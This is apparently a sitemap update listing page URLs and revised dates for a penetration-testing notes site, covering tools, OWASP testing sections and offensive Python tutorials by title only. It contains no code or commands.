2024-06-08 daily https://amandaguglieri.github.io/hackinglife/phpggc/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ping/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/postfix/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/powerapps-pentesting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/powercat/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/powershell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/powerup/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/powerview/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/process-capabilities-getcap/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/process-hacker-tool/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/proxies/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/pyftpdlib/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/pyinstaller/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/pypykatz/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/rdesktop/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/regex/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/regshot/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/remove-bloatware/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/responder/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/reverse-shells/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/rooting-mobile/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/rpcclient/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/rsat-remote-server-administration-tools/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/rules-of-engagement-checklist/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/samba-suite/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/samrdump/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/scrcpy/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/searchsploit/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/seatbelt/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/servers/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/setting-up-mobile-penstesting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sharpview/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/shodan/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sireprat/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/smbclient/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/smbmap/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/smbserver/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/snmpwalk/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/spawn-a-shell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sqli-manual-attack/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sqlite/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sqlmap/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sqlplus/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sqsh/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ssh-audit/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ssh-for-github/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ssh-keys/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ssh-tunneling/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sshpass/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sslyze/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sublist3r/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/suid-binaries/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/sys-internals-suite/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/tcpdump/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/the-harvester/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/tmux/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/tomcat-pentesting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/transferring-files-evading-detection/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/transferring-files-techniques-code/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/transferring-files-techniques-linux/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/transferring-files-techniques-windows/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/unshadow/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/uploadserver/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/username-anarchy/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/veil/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/vim/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/virtualbox/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/vnstat/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/vpn/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/vulnerability-assessment/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/vulnhub-goldeneye-1/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/vulnhub-raven-1/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/vulnhub-raven-2/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/w3af/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/wafw00f/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/walkthroughs/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/waybackurls/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/web-services/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/web-shells/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webdav-wsgidav/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/weevely/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/wfuzz/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/whatweb/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/whitewinterwolf-webshell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/window-detective/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/windows-binaries/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/windows-credentials-storage/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/windows-null-session-attack/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/windows-privilege-escalation-history/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/winfo/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/winpeas/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/winspy/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/wireless-security/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/wmctrl/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/wordpress-pentesting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/wpscan/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/xfreerdp/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/xsltproc/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/xsser/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ysoserial/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-APIT-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-06/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-07/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-08/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-09/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-10/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHN-11/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHZ-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHZ-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHZ-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHZ-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ATHZ-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-06/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-07/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-08/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-09/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-BUSL-10/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-06/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-07/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-08/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-09/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-10/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-11/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-12/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-13/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CLNT-14/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-06/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-07/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-08/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-09/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-10/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-11/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-12/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CONF-13/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CRYP-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CRYP-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CRYP-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-CRYP-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ERRH-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-ERRH-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-IDNT-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-IDNT-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-IDNT-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-IDNT-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-IDNT-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-06/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-07/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-08/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-09/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INFO-10/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-06/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-07/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-08/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-09/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-10/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-11/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-12/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-13/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-14/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-15/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-16/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-17/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-18/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-19/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-INPV-20/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-01/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-02/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-03/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-04/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-05/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-06/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-07/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-08/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-09/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/OWASP/WSTG-SESS-10/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/RFID/mifare-classic/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/RFID/mifare-desfire/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/RFID/proxmark3-rdv4.01-setting-up/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/RFID/proxmark3/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/RFID/rfid/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-broken-access-control/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-insecure-deserialization/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-jwt/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-labs/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-sqli/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-ssrf/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-ssti/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-xss/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/burpsuite-xxe/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/apache-cloudstack/apache-cloudstack-essentials/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/aws/aws-essentials/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/aws/pentesting-aws/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-104-preparation/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-500-ad-1-identity-and-access/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-500-ad-2-platform-protection/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-500-ad-3-data-and-applications/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-500-ad-4-security-operations/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-500-exams/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-500-keep-learning/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-500-preparation/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-900-exams/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/az-900-preparation/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/azure/pentesting-azure/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/containers/pentesting-docker/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/gcp/gcp-essentials/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloud/openstasck/openstack-essentials/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/files/index-of-files/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/api-authentication-attacks/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/api-reconnaissance/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/endpoint-analysis/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/evasion-combining-techniques/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/exploiting-api-authorization/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/improper-assets-management/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/injection-attacks/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/mass-assignment/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/other-labs/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/scanning-apis/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/server-side-request-forgery-ssrf/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/hackingapis/setting-up-kali/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/pip/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/pyenv/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/python-installation/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/python-keylogger/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/python-tools-for-pentesting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/python-virtual-environments/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/ - 2024-06-07 + 2024-06-08 daily 